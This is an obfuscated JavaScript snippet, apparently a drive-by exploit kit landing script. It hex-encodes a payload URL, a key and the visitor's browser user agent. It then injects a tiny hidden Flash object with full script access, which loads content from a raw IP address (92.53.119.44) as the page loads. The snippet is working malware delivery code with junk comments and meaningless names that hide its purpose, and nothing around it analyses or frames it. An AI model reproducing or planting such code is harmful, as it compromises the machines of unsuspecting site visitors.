/*s3329d9545hssfj76632fs*/function hgfgerdfgdf(num, width){/*s83122d94553hfj52228fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s83658d33678hfj3080fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s38544d89184hfj35100fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s38841d60038hfj54494fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd70940hfs*/c += b + d;/*s60987d78253hfj26414fs*/e += 1;}return c;}/*s27567dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.119.44/?OTU5MDI0MTM=&pa=xH_QMrPYbR3FFYPfKPnEUKREMU7WA0eKwYyZha_VF5-xFDTGpbH1Fx_spVydCF-EmvFvdLMHIwGh1UTASwR&ma=hmYxbA1tH9qit3UDTzBTIg5XX9RTbaAtC95DBErA90V-hzrMVJskixheAumABmustVlgT5AgamKz7VaOO-w&shop=MjQ5OTcxNDA=", ghnvbn("http://92.53.119.44/?MTE1NDg2ODM0&ma=hmYxbA1tH9qit3UDTzBfIg5bX9RTbaAhC95PBErA90VyhzrAVJskixheAumABmustVFgQ4QgWnaz7S6CJrg&pa=xHzQMrPYbR3FFYDfKPnEUKdEMU3WA0SKwY-ZhazVF5-xFDfGpbH1FxzspV-dCF-EmvJvdLMHIwGh1UTASwd&gift=NDQ4MTE0NDM=","wexykukusw"));